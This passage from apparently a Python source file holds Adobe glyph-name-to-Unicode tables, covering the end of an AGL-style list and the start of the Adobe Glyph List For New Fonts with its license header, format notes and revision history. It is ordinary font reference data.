vewarmenian;057E vhook;028B vikatakana;30F8 viramabengali;09CD viramadeva;094D viramagujarati;0ACD visargabengali;0983 visargadeva;0903 visargagujarati;0A83 vmonospace;FF56 voarmenian;0578 voicediterationhiragana;309E voicediterationkatakana;30FE voicedmarkkana;309B voicedmarkkanahalfwidth;FF9E vokatakana;30FA vparen;24B1 vtilde;1E7D vturned;028C vuhiragana;3094 vukatakana;30F4 w;0077 wacute;1E83 waekorean;3159 wahiragana;308F wakatakana;30EF wakatakanahalfwidth;FF9C wakorean;3158 wasmallhiragana;308E wasmallkatakana;30EE wattosquare;3357 wavedash;301C wavyunderscorevertical;FE34 wawarabic;0648 wawfinalarabic;FEEE wawhamzaabovearabic;0624 wawhamzaabovefinalarabic;FE86 wbsquare;33DD wcircle;24E6 wcircumflex;0175 wdieresis;1E85 wdotaccent;1E87 wdotbelow;1E89 wehiragana;3091 weierstrass;2118 wekatakana;30F1 wekorean;315E weokorean;315D wgrave;1E81 whitebullet;25E6 whitecircle;25CB whitecircleinverse;25D9 whitecornerbracketleft;300E whitecornerbracketleftvertical;FE43 whitecornerbracketright;300F whitecornerbracketrightvertical;FE44 whitediamond;25C7 whitediamondcontainingblacksmalldiamond;25C8 whitedownpointingsmalltriangle;25BF whitedownpointingtriangle;25BD whiteleftpointingsmalltriangle;25C3 whiteleftpointingtriangle;25C1 whitelenticularbracketleft;3016 whitelenticularbracketright;3017 whiterightpointingsmalltriangle;25B9 whiterightpointingtriangle;25B7 whitesmallsquare;25AB whitesmilingface;263A whitesquare;25A1 whitestar;2606 whitetelephone;260F whitetortoiseshellbracketleft;3018 whitetortoiseshellbracketright;3019 whiteuppointingsmalltriangle;25B5 whiteuppointingtriangle;25B3 wihiragana;3090 wikatakana;30F0 wikorean;315F wmonospace;FF57 wohiragana;3092 wokatakana;30F2 wokatakanahalfwidth;FF66 won;20A9 wonmonospace;FFE6 wowaenthai;0E27 wparen;24B2 wring;1E98 wsuperior;02B7 wturned;028D wynn;01BF x;0078 xabovecmb;033D xbopomofo;3112 xcircle;24E7 xdieresis;1E8D xdotaccent;1E8B xeharmenian;056D xi;03BE xmonospace;FF58 xparen;24B3 xsuperior;02E3 y;0079 yaadosquare;334E yabengali;09AF yacute;00FD yadeva;092F yaekorean;3152 yagujarati;0AAF yagurmukhi;0A2F yahiragana;3084 yakatakana;30E4 yakatakanahalfwidth;FF94 yakorean;3151 yamakkanthai;0E4E yasmallhiragana;3083 yasmallkatakana;30E3 yasmallkatakanahalfwidth;FF6C yatcyrillic;0463 ycircle;24E8 ycircumflex;0177 ydieresis;00FF ydotaccent;1E8F ydotbelow;1EF5 yeharabic;064A yehbarreearabic;06D2 yehbarreefinalarabic;FBAF yehfinalarabic;FEF2 yehhamzaabovearabic;0626 yehhamzaabovefinalarabic;FE8A yehhamzaaboveinitialarabic;FE8B yehhamzaabovemedialarabic;FE8C yehinitialarabic;FEF3 yehmedialarabic;FEF4 yehmeeminitialarabic;FCDD yehmeemisolatedarabic;FC58 yehnoonfinalarabic;FC94 yehthreedotsbelowarabic;06D1 yekorean;3156 yen;00A5 yenmonospace;FFE5 yeokorean;3155 yeorinhieuhkorean;3186 yerahbenyomohebrew;05AA yerahbenyomolefthebrew;05AA yericyrillic;044B yerudieresiscyrillic;04F9 yesieungkorean;3181 yesieungpansioskorean;3183 yesieungsioskorean;3182 yetivhebrew;059A ygrave;1EF3 yhook;01B4 yhookabove;1EF7 yiarmenian;0575 yicyrillic;0457 yikorean;3162 yinyang;262F yiwnarmenian;0582 ymonospace;FF59 yod;05D9 yoddagesh;FB39 yoddageshhebrew;FB39 yodhebrew;05D9 yodyodhebrew;05F2 yodyodpatahhebrew;FB1F yohiragana;3088 yoikorean;3189 yokatakana;30E8 yokatakanahalfwidth;FF96 yokorean;315B yosmallhiragana;3087 yosmallkatakana;30E7 yosmallkatakanahalfwidth;FF6E yotgreek;03F3 yoyaekorean;3188 yoyakorean;3187 yoyakthai;0E22 yoyingthai;0E0D yparen;24B4 ypogegrammeni;037A ypogegrammenigreekcmb;0345 yr;01A6 yring;1E99 ysuperior;02B8 ytilde;1EF9 yturned;028E yuhiragana;3086 yuikorean;318C yukatakana;30E6 yukatakanahalfwidth;FF95 yukorean;3160 yusbigcyrillic;046B yusbigiotifiedcyrillic;046D yuslittlecyrillic;0467 yuslittleiotifiedcyrillic;0469 yusmallhiragana;3085 yusmallkatakana;30E5 yusmallkatakanahalfwidth;FF6D yuyekorean;318B yuyeokorean;318A yyabengali;09DF yyadeva;095F z;007A zaarmenian;0566 zacute;017A zadeva;095B zagurmukhi;0A5B zaharabic;0638 zahfinalarabic;FEC6 zahinitialarabic;FEC7 zahiragana;3056 zahmedialarabic;FEC8 zainarabic;0632 zainfinalarabic;FEB0 zakatakana;30B6 zaqefgadolhebrew;0595 zaqefqatanhebrew;0594 zarqahebrew;0598 zayin;05D6 zayindagesh;FB36 zayindageshhebrew;FB36 zayinhebrew;05D6 zbopomofo;3117 zcaron;017E zcircle;24E9 zcircumflex;1E91 zcurl;0291 zdot;017C zdotaccent;017C zdotbelow;1E93 zecyrillic;0437 zedescendercyrillic;0499 zedieresiscyrillic;04DF zehiragana;305C zekatakana;30BC zero;0030 zeroarabic;0660 zerobengali;09E6 zerodeva;0966 zerogujarati;0AE6 zerogurmukhi;0A66 zerohackarabic;0660 zeroinferior;2080 zeromonospace;FF10 zerooldstyle;F730 zeropersian;06F0 zerosuperior;2070 zerothai;0E50 zerowidthjoiner;FEFF zerowidthnonjoiner;200C zerowidthspace;200B zeta;03B6 zhbopomofo;3113 zhearmenian;056A zhebrevecyrillic;04C2 zhecyrillic;0436 zhedescendercyrillic;0497 zhedieresiscyrillic;04DD zihiragana;3058 zikatakana;30B8 zinorhebrew;05AE zlinebelow;1E95 zmonospace;FF5A zohiragana;305E zokatakana;30BE zparen;24B5 zretroflexhook;0290 zstroke;01B6 zuhiragana;305A zukatakana;30BA # END """ _aglfnText = """\ # ----------------------------------------------------------- # Copyright 2002-2019 Adobe (http://www.adobe.com/). # # Redistribution and use in source and binary forms, with or # without modification, are permitted provided that the # following conditions are met: # # Redistributions of source code must retain the above # copyright notice, this list of conditions and the following # disclaimer. # # Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials # provided with the distribution. # # Neither the name of Adobe nor the names of its contributors # may be used to endorse or promote products derived from this # software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND # CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT # NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) # HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # ----------------------------------------------------------- # Name: Adobe Glyph List For New Fonts # Table version: 1.7 # Date: November 6, 2008 # URL: https://github.com/adobe-type-tools/agl-aglfn # # Description: # # AGLFN (Adobe Glyph List For New Fonts) provides a list of base glyph # names that are recommended for new fonts, which are compatible with # the AGL (Adobe Glyph List) Specification, and which should be used # as described in Section 6 of that document. AGLFN comprises the set # of glyph names from AGL that map via the AGL Specification rules to # the semantically correct UV (Unicode Value). For example, "Asmall" # is omitted because AGL maps this glyph name to the PUA (Private Use # Area) value U+F761, rather than to the UV that maps from the glyph # name "A." Also omitted is "ffi," because AGL maps this to the # Alphabetic Presentation Forms value U+FB03, rather than decomposing # it into the following sequence of three UVs: U+0066, U+0066, and # U+0069. The name "arrowvertex" has been omitted because this glyph # now has a real UV, and AGL is now incorrect in mapping it to the PUA # value U+F8E6. If you do not find an appropriate name for your glyph # in this list, then please refer to Section 6 of the AGL # Specification. # # Format: three semicolon-delimited fields: # (1) Standard UV or CUS UV--four uppercase hexadecimal digits # (2) Glyph name--upper/lowercase letters and digits # (3) Character names: Unicode character names for standard UVs, and # descriptive names for CUS UVs--uppercase letters, hyphen, and # space # # The records are sorted by glyph name in increasing ASCII order, # entries with the same glyph name are sorted in decreasing priority # order, the UVs and Unicode character names are provided for # convenience, lines starting with "#" are comments, and blank lines # should be ignored. # # Revision History: # # 1.7 [6 November 2008] # - Reverted to the original 1.4 and earlier mappings for Delta, # Omega, and mu. # - Removed mappings for "afii" names. These should now be assigned # "uni" names. # - Removed mappings for "commaaccent" names. These should now be # assigned "uni" names. # # 1.6 [30 January 2006] # - Completed work intended in 1.5. # # 1.5 [23 November 2005] # - Removed duplicated block at end of file. # - Changed mappings: # 2206;Delta;INCREMENT changed to 0394;Delta;GREEK CAPITAL LETTER DELTA # 2126;Omega;OHM SIGN changed to 03A9;Omega;GREEK CAPITAL LETTER OMEGA # 03BC;mu;MICRO SIGN changed to 03BC;mu;GREEK SMALL LETTER MU # - Corrected statement above about why "ffi" is omitted. # # 1.4 [24 September 2003] # - Changed version to 1.4, to avoid confusion with the AGL 1.3. # - Fixed spelling errors in the header. # - Fully removed "arrowvertex," as it is mapped only to a PUA Unicode # value in some fonts. # # 1.1 [17 April 2003] # - Renamed [Tt]cedilla back to [Tt]commaaccent. # # 1.0 [31 January 2003] # - Original version. # - Derived from the AGLv1.2 by: # removing the PUA area codes; # removing duplicate Unicode mappings; and # renaming "tcommaaccent" to "tcedilla" and "Tcommaaccent" to "Tcedilla" # 0041;A;LATIN CAPITAL LETTER A 00C6;AE;LATIN CAPITAL LETTER AE 01FC;AEacute;LATIN CAPITAL LETTER AE WITH ACUTE 00C1;Aacute;LATIN CAPITAL LETTER A WITH ACUTE 0102;Abreve;LATIN CAPITAL LETTER A WITH BREVE 00C2;Acircumflex;LATIN CAPITAL LETTER A WITH CIRCUMFLEX 00C4;Adieresis;LATIN CAPITAL LETTER A WITH DIAERESIS 00C0;Agrave;LATIN CAPITAL LETTER A WITH GRAVE 0391;Alpha;GREEK CAPITAL LETTER ALPHA 0386;Alphatonos;GREEK CAPITAL LETTER ALPHA WITH TONOS 0100;Amacron;LATIN CAPITAL LETTER A WITH MACRON 0104;Aogonek;LATIN CAPITAL LETTER A WITH OGONEK 00C5;Aring;LATIN CAPITAL LETTER A WITH RING ABOVE 01FA;Aringacute;LATIN CAPITAL LETTER A WITH RING ABOVE AND ACUTE 00C3;Atilde;LATIN CAPITAL LETTER A WITH TILDE 0042;B;LATIN CAPITAL LETTER B 0392;Beta;GREEK CAPITAL LETTER BETA 0043;C;LATIN CAPITAL LETTER C 0106;Cacute;LATIN CAPITAL LETTER C WITH ACUTE 010C;Ccaron;LATIN CAPITAL LETTER C WITH CARON 00C7;Ccedilla;LATIN CAPITAL LETTER C WITH CEDILLA 0108;Ccircumflex;LATIN CAPITAL LETTER C WITH CIRCUMFLEX 010A;Cdotaccent;LATIN CAPITAL LETTER C WITH DOT ABOVE 03A7;Chi;GREEK CAPITAL LETTER CHI 0044;D;LATIN CAPITAL LETTER D 010E;Dcaron;LATIN CAPITAL LETTER D WITH CARON 0110;Dcroat;LATIN CAPITAL LETTER D WITH STROKE 2206;Delta;INCREMENT 0045;E;LATIN CAPITAL LETTER E 00C9;Eacute;LATIN CAPITAL LETTER E WITH ACUTE 0114;Ebreve;LATIN CAPITAL LETTER E WITH BREVE 011A;Ecaron;LATIN CAPITAL LETTER E WITH CARON 00CA;Ecircumflex;LATIN CAPITAL LETTER E WITH CIRCUMFLEX 00CB;Edieresis;LATIN CAPITAL LETTER E WITH DIAERESIS 0116;Edotaccent;LATIN CAPITAL LETTER E WITH DOT ABOVE 00C8;Egrave;LATIN CAPITAL LETTER E WITH GRAVE 0112;Emacron;LATIN CAPITAL LETTER E WITH MACRON 014A;Eng;LATIN CAPITAL LETTER ENG 0118;Eogonek;LATIN CAPITAL LETTER E WITH OGONEK 0395;Epsilon;GREEK CAPITAL LETTER EPSILON 0388;Epsilontonos;GREEK CAPITAL LETTER EPSILON WITH TONOS 0397;Eta;GREEK CAPITAL LETTER ETA 0389;Etatonos;GREEK CAPITAL LETTER ETA WITH TONOS 00D0;Eth;LATIN CAPITAL LETTER ETH 20AC;Euro;EURO SIGN 0046;F;LATIN CAPITAL LETTER F 0047;G;LATIN CAPITAL LETTER G 0393;Gamma;GREEK CAPITAL LETTER GAMMA 011E;Gbreve;LATIN CAPITAL LETTER G WITH BREVE 01E6;Gcaron;LATIN CAPITAL LETTER G WITH CARON 011C;Gcircumflex;LATIN CAPITAL LETTER G WITH CIRCUMFLEX 0120;Gdotaccent;LATIN CAPITAL LETTER G WITH DOT ABOVE 0048;H;LATIN CAPITAL LETTER H 25CF;H18533;BLACK CIRCLE 25AA;H18543;BLACK SMALL SQUARE 25AB;H18551;WHITE SMALL SQUARE 25A1;H22073;WHITE SQUARE 0126;Hbar;LATIN CAPITAL LETTER H WITH STROKE 0124;Hcircumflex;LATIN CAPITAL LETTER H WITH CIRCUMFLEX 0049;I;LATIN CAPITAL LETTER I 0132;IJ;LATIN CAPITAL LIGATURE IJ 00CD;Iacute;LATIN CAPITAL LETTER I WITH ACUTE 012C;Ibreve;LATIN CAPITAL LETTER I WITH BREVE 00CE;Icircumflex;LATIN CAPITAL LETTER I WITH CIRCUMFLEX 00CF;Idieresis;LATIN CAPITAL LETTER I WITH DIAERESIS 0130;Idotaccent;LATIN CAPITAL LETTER I WITH DOT ABOVE 2111;Ifraktur;BLACK-LETTER CAPITAL I 00CC;Igrave;LATIN CAPITAL LETTER I WITH GRAVE 012A;Imacron;LATIN CAPITAL LETTER I WITH MACRON 012E;Iogonek;LATIN CAPITAL LETTER I WITH OGONEK 0399;Iota;GREEK CAPITAL LETTER IOTA 03AA;Iotadieresis;GREEK CAPITAL LETTER IOTA WITH DIALYTIKA 038A;Iotatonos;GREEK CAPITAL LETTER IOTA WITH TONOS 0128;Itilde;LATIN CAPITAL LETTER I WITH TILDE 004A;J;LATIN CAPITAL LETTER J 0134;Jcircumflex;LATIN CAPITAL LETTER J WITH CIRCUMFLEX 004B;K;LATIN CAPITAL LETTER K 039A;Kappa;GREEK CAPITAL LETTER KAPPA 004C;L;LATIN CAPITAL LETTER L 0139;Lacute;LATIN CAPITAL LETTER L WITH ACUTE 039B;Lambda;GREEK CAPITAL LETTER LAMDA 013D;Lcaron;LATIN CAPITAL LETTER L WITH CARON 013F;Ldot;LATIN CAPITAL LETTER L WITH MIDDLE DOT 0141;Lslash;LATIN CAPITAL LETTER L WITH STROKE 004D;M;LATIN CAPITAL LETTER M 039C;Mu;GREEK CAPITAL LETTER MU 004E;N;LATIN CAPITAL LETTER N 0143;Nacute;LATIN CAPITAL LETTER N WITH ACUTE 0147;Ncaron;LATIN CAPITAL LETTER N WITH CARON 00D1;Ntilde;LATIN CAPITAL LETTER N WITH TILDE 039D;Nu;GREEK CAPITAL LETTER NU 004F;O;LATIN CAPITAL LETTER O 0152;OE;LATIN CAPITAL LIGATURE OE 00D3;Oacute;LATIN CAPITAL LETTER O WITH ACUTE 014E;Obreve;LATIN CAPITAL LETTER O WITH BREVE 00D4;Ocircumflex;LATIN CAPITAL LETTER O WITH CIRCUMFLEX 00D6;Odieresis;LATIN CAPITAL LETTER O WITH DIAERESIS 00D2;Ograve;LATIN CAPITAL LETTER O WITH GRAVE 01A0;Ohorn;LATIN CAPITAL LETTER O WITH HORN 0150;Ohungarumlaut;LATIN CAPITAL LETTER O WITH DOUBLE ACUTE 014C;Omacron;LATIN CAPITAL LETTER O WITH MACRON 2126;Omega;OHM SIGN 038F;Omegatonos;GREEK CAPITAL LETTER OMEGA WITH TONOS 039F;Omicron;GREEK CAPITAL LETTER OMICRON 038C;Omicrontonos;GREEK CAPITAL LETTER OMICRON WITH TONOS 00D8;Oslash;LATIN CAPITAL LETTER O WITH STROKE 01FE;Oslashacute;LATIN CAPITAL LETTER O WITH STROKE AND ACUTE 00D5;Otilde;LATIN CAPITAL LETTER O WITH TILDE 0050;P;LATIN CAPITAL LETTER P 03A6;Phi;GREEK CAPITAL LETTER PHI 03A0;Pi;GREEK CAPITAL LETTER PI 03A8;Psi;GREEK CAPITAL LETTER PSI 0051;Q;LATIN CAPITAL LETTER Q 0052;R;LATIN CAPITAL LETTER R 0154;Racute;LATIN CAPITAL LETTER R WITH ACUTE 0158;Rcaron;LATIN CAPITAL LETTER R WITH CARON 211C;Rfraktur;BLACK-LETTER CAPITAL R 03A1;Rho;GREEK CAPITAL LETTER RHO 0053;S;LATIN CAPITAL LETTER S 250C;SF010000;BOX DRAWINGS LIGHT DOWN AND RIGHT 2514;SF020000;BOX DRAWINGS LIGHT UP AND RIGHT 2510;SF030000;BOX DRAWINGS LIGHT DOWN AND LEFT 2518;SF040000;BOX DRAWINGS LIGHT UP AND LEFT 253C;SF050000;BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL 252C;SF060000;BOX DRAWINGS LIGHT DOWN AND HORIZONTAL 2534;SF070000;BOX DRAWINGS LIGHT UP AND HORIZONTAL 251C;SF080000;BOX DRAWINGS LIGHT VERTICAL AND RIGHT 2524;SF090000;BOX DRAWINGS LIGHT VERTICAL AND LEFT 2500;SF100000;BOX DRAWINGS LIGHT HORIZONTAL 2502;SF110000;BOX DRAWINGS LIGHT VERTICAL 2561;SF190000;BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE 2562;SF200000;BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE 2556;SF210000;BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE 2555;SF220000;BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE 2563;SF230000;BOX DRAWINGS DOUBLE VERTICAL AND LEFT 2551;SF240000;BOX DRAWINGS DOUBLE VERTICAL 2557;SF250000;BOX DRAWINGS DOUBLE DOWN AND LEFT 255D;SF260000;BOX DRAWINGS DOUBLE UP AND LEFT 255C;SF270000;BOX DRAWINGS UP DOUBLE AND LEFT SINGLE 255B;SF280000;BOX DRAWINGS UP SINGLE AND LEFT DOUBLE 255E;SF360000;BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE 255F;SF370000;BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE 255A;SF380000;BOX DRAWINGS DOUBLE UP AND RIGHT 2554;SF390000;BOX DRAWINGS DOUBLE DOWN AND RIGHT 2569;SF400000;BOX DRAWINGS DOUBLE UP AND HORIZONTAL 2566;SF410000;BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL 2560;SF420000;BOX DRAWINGS DOUBLE VERTICAL AND RIGHT 2550;SF430000;BOX DRAWINGS DOUBLE HORIZONTAL 256C;SF440000;BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL 2567;SF450000;BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE 2568;SF460000;BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE 2564;SF470000;BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE 2565;SF480000;BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE 2559;SF490000;BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE 2558;SF500000;BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE 2552;SF510000;BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE 2553;SF520000;BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE 256B;SF530000;BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE 256A;SF540000;BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE 015A;Sacute;LATIN CAPITAL LETTER S WITH ACUTE 0160;Scaron;LATIN CAPITAL LETTER S WITH CARON 015E;Scedilla;LATIN CAPITAL LETTER S WITH CEDILLA 015C;Scircumflex;LATIN CAPITAL LETTER S WITH CIRCUMFLEX 03A3;Sigma;GREEK CAPITAL LETTER SIGMA 0054;T;LATIN CAPITAL LETTER T 03A4;Tau;GREEK CAPITAL LETTER TAU 0166;Tbar;LATIN CAPITAL LETTER T WITH STROKE 0164;Tcaron;LATIN CAPITAL LETTER T WITH CARON 0398;Theta;GREEK CAPITAL LETTER THETA 00DE;Thorn;LATIN CAPITAL LETTER THORN 0055;U;LATIN CAPITAL LETTER U 00DA;Uacute;LATIN CAPITAL LETTER U WITH ACUTE 016C;Ubreve;LATIN CAPITAL LETTER U WITH BREVE 00DB;Ucircumflex;LATIN CAPITAL LETTER U WITH CIRCUMFLEX 00DC;Udieresis;LATIN CAPITAL LETTER U WITH DIAERESIS 00D9;Ugrave;LATIN CAPITAL LETTER U WITH GRAVE 01AF;Uhorn;LATIN CAPITAL LETTER U WITH HORN 0170;Uhungarumlaut;LATIN CAPITAL LETTER U WITH DOUBLE ACUTE 016A;Umacron;LATIN CAPITAL LETTER U WITH MACRON 0172;Uogonek;LATIN CAPITAL LETTER U WITH OGONEK 03A5;Upsilon;GREEK CAPITAL LETTER UPSILON 03D2;Upsilon1;GREEK UPSILON WITH HOOK SYMBOL 03AB;Upsilondieresis;GREEK CAPITAL LETTER UPSILON WITH DIALYTIKA 038E;Upsilontonos;GREEK CAPITAL LETTER UPSILON WITH TONOS 016E;Uring;LATIN CAPITAL LETTER U WITH RING ABOVE 0168;Utilde;LATIN CAPITAL LETTER U WITH TILDE 0056;V;LATIN CAPITAL LETTER V 0057;W;LATIN CAPITAL LETTER W 1E82;Wacute;LATIN CAPITAL LETTER W WITH ACUTE 0174;Wcircumflex;LATIN CAPITAL LETTER W WITH CIRCUMFLEX 1E84;Wdieresis;LATIN CAPITAL LETTER W WITH DIAERESIS 1E80;Wgrave;LATIN CAPITAL LETTER W WITH GRAVE 0058;X;LATIN CAPITAL LETTER X 039E;Xi;GREEK CAPITAL LETTER XI 0059;Y;LATIN CAPITAL LETTER Y 00DD;Yacute;LATIN CAPITAL LETTER Y WITH ACUTE 0176;Ycircumflex;LATIN CAPITAL LETTER Y WITH CIRCUMFLEX 0178;Ydieresis;LATIN CAPITAL LETTER Y WITH DIAERESIS 1EF2;Ygrave;LATIN CAPITAL LETTER Y WITH GRAVE 005A;Z;LATIN CAPITAL LETTER Z 0179;Zacute;LATIN CAPITAL LETTER Z WITH ACUTE 017D;Zcaron;LATIN CAPITAL LETTER Z WITH CARON 017B;Zdotaccent;LATIN CAPITAL LETTER Z WITH DOT ABOVE 0396;Zeta;GREEK CAPITAL LETTER ZETA 0061;a;LATIN SMALL LETTER A 00E1;aacute;LATIN SMALL LETTER A WITH ACUTE 0103;abreve;LATIN SMALL LETTER A WITH BREVE 00E2;acircumflex;LATIN SMALL LETTER A WITH CIRCUMFLEX 00B4;acute;ACUTE ACCENT 0301;acutecomb;COMBINING ACUTE ACCENT 00E4;adieresis;LATIN SMALL LETTER A WITH DIAERESIS 00E6;ae;LATIN SMALL LETTER AE 01FD;aeacute;LATIN SMALL LETTER AE WITH ACUTE 00E0;agrave;LATIN SMALL LETTER A WITH GRAVE 2135;aleph;ALEF SYMBOL 03B1;alpha;GREEK SMALL LETTER ALPHA 03AC;alphatonos;GREEK SMALL LETTER ALPHA WITH TONOS 0101;amacron;LATIN SMALL LETTER A WITH MACRON 0026;ampersand;AMPERSAND 2220;angle;ANGLE 2329;angleleft;LEFT-POINTING ANGLE BRACKET 232A;angleright;RIGHT-POINTING ANGLE BRACKET 0387;anoteleia;GREEK ANO TELEIA 0105;aogonek;LATIN SMALL LETTER A WITH OGONEK 2248;approxequal;ALMOST EQUAL TO 00E5;aring;LATIN SMALL LETTER A WITH RING ABOVE 01FB;aringacute;LATIN SMALL LETTER A WITH RING ABOVE AND ACUTE 2194;arrowboth;LEFT RIGHT ARROW 21D4;arrowdblboth;LEFT RIGHT DOUBLE ARROW 21D3;arrowdbldown;DOWNWARDS DOUBLE ARROW 21D0;arrowdblleft;LEFTWARDS DOUBLE ARROW 21D2;arrowdblright;RIGHTWARDS DOUBLE ARROW 21D1;arrowdblup;UPWARDS DOUBLE ARROW 2193;arrowdown;DOWNWARDS ARROW 2190;arrowleft;LEFTWARDS ARROW 2192;arrowright;RIGHTWARDS ARROW 2191;arrowup;UPWARDS ARROW 2195;arrowupdn;UP DOWN ARROW 21A8;arrowupdnbse;UP DOWN ARROW WITH BASE 005E;asciicircum;CIRCUMFLEX ACCENT 007E;asciitilde;TILDE 002A;asterisk;ASTERISK 2217;asteriskmath;ASTERISK OPERATOR 0040;at;COMMERCIAL AT 00E3;atilde;LATIN SMALL LETTER A WITH TILDE 0062;b;LATIN SMALL LETTER B 005C;backslash;REVERSE SOLIDUS 007C;bar;VERTICAL LINE 03B2;beta;GREEK SMALL LETTER BETA 2588;block;FULL BLOCK 007B;braceleft;LEFT CURLY BRACKET 007D;braceright;RIGHT CURLY BRACKET 005B;bracketleft;LEFT SQUARE BRACKET 005D;bracketright;RIGHT SQUARE BRACKET 02D8;breve;BREVE 00A6;brokenbar;BROKEN BAR 2022;bullet;BULLET 0063;c;LATIN SMALL LETTER C 0107;cacute;LATIN SMALL LETTER C WITH ACUTE 02C7;caron;CARON 21B5;carriagereturn;DOWNWARDS ARROW WITH CORNER LEFTWARDS 010D;ccaron;LATIN SMALL LETTER C WITH CARON 00E7;ccedilla;LATIN SMALL LETTER C WITH CEDILLA 0109;ccircumflex;LATIN SMALL LETTER C WITH CIRCUMFLEX 010B;cdotaccent;LATIN SMALL LETTER C WITH DOT ABOVE 00B8;cedilla;CEDILLA 00A2;cent;CENT SIGN 03C7;chi;GREEK SMALL LETTER CHI 25CB;circle;WHITE CIRCLE 2297;circlemultiply;CIRCLED TIMES 2295;circleplus;CIRCLED PLUS 02C6;circumflex;MODIFIER LETTER CIRCUMFLEX ACCENT 2663;club;BLACK CLUB SUIT 003A;colon;COLON 20A1;colonmonetary;COLON SIGN 002C;comma;COMMA 2245;congruent;APPROXIMATELY EQUAL TO 00A9;copyright;COPYRIGHT SIGN 00A4;currency;CURRENCY SIGN 0064;d;LATIN SMALL LETTER D 2020;dagger;DAGGER 2021;daggerdbl;DOUBLE DAGGER 010F;dcaron;LATIN SMALL LETTER D WITH CARON 0111;dcroat;LATIN SMALL LETTER D WITH STROKE 00B0;degree;DEGREE SIGN 03B4;delta;GREEK SMALL LETTER DELTA 2666;diamond;BLACK DIAMOND SUIT 00A8;dieresis;DIAERESIS 0385;dieresistonos;GREEK DIALYTIKA TONOS 00F7;divide;DIVISION SIGN 2593;dkshade;DARK SHADE 2584;dnblock;LOWER HALF BLOCK 0024;dollar;DOLLAR SIGN 20AB;dong;DONG SIGN 02D9;dotaccent;DOT ABOVE 0323;dotbelowcomb;COMBINING DOT BELOW 0131;dotlessi;LATIN SMALL LETTER DOTLESS I 22C5;dotmath;DOT OPERATOR 0065;e;LATIN SMALL LETTER E 00E9;eacute;LATIN SMALL LETTER E WITH ACUTE 0115;ebreve;LATIN SMALL LETTER E WITH BREVE 011B;ecaron;LATIN SMALL LETTER E WITH CARON 00EA;ecircumflex;LATIN SMALL LETTER E WITH CIRCUMFLEX 00EB;edieresis;LATIN SMALL LETTER E WITH DIAERESIS 0117;edotaccent;LATIN SMALL LETTER E WITH DOT ABOVE 00E8;egrave;LATIN SMALL LETTER E WITH GRAVE 0038;eight;DIGIT EIGHT 2208;element;ELEMENT OF 2026;ellipsis;HORIZONTAL ELLIPSIS 0113;emacron;LATIN SMALL LETTER E WITH MACRON 2014;emdash;EM DASH 2205;emptyset;EMPTY SET 2013;endash;EN DASH 014B;eng;LATIN SMALL LETTER ENG 0119;eogonek;LATIN SMALL LETTER E WITH OGONEK 03B5;epsilon;GREEK SMALL LETTER EPSILON 03AD;epsilontonos;GREEK SMALL LETTER EPSILON WITH TONOS 003D;equal;EQUALS SIGN 2261;equivalence;IDENTICAL TO 212E;estimated;ESTIMATED SYMBOL 03B7;eta;GREEK SMALL LETTER ETA 03AE;etatonos;GREEK SMALL LETTER ETA WITH TONOS 00F0;eth;LATIN SMALL LETTER ETH 0021;exclam;EXCLAMATION MARK 203C;exclamdbl;DOUBLE EXCLAMATION MARK 00A1;exclamdown;INVERTED EXCLAMATION MARK 2203;existential;THERE EXISTS 0066;f;LATIN SMALL LETTER F 2640;female;FEMALE SIGN 2012;figuredash;FIGURE DASH 25A0;filledbox;BLACK SQUARE 25AC;filledrect;BLACK RECTANGLE 0035;five;DIGIT FIVE 215D;fiveeighths;VULGAR FRACTION FIVE EIGHTHS 0192;florin;LATIN SMALL LETTER F WITH HOOK 0034;four;DIGIT FOUR 2044;fraction;FRACTION SLASH 20A3;franc;FRENCH FRANC SIGN 0067;g;LATIN SMALL LETTER G 03B3;gamma;GREEK SMALL LETTER GAMMA 011F;gbreve;LATIN SMALL LETTER G WITH BREVE 01E7;gcaron;LATIN SMALL LETTER G WITH CARON 011D;gcircumflex;LATIN SMALL LETTER G WITH CIRCUMFLEX 0121;gdotaccent;LATIN SMALL LETTER G WITH DOT ABOVE 00DF;germandbls;LATIN SMALL LETTER SHARP S 2207;gradient;NABLA 0060;grave;GRAVE ACCENT 0300;gravecomb;COMBINING GRAVE ACCENT 003E;greater;GREATER-THAN SIGN 2265;greaterequal;GREATER-THAN OR EQUAL TO 00AB;guillemotleft;LEFT-POINTING DOUBLE ANGLE QUOTATION MARK 00BB;guillemotright;RIGHT-POINTING DOUBLE 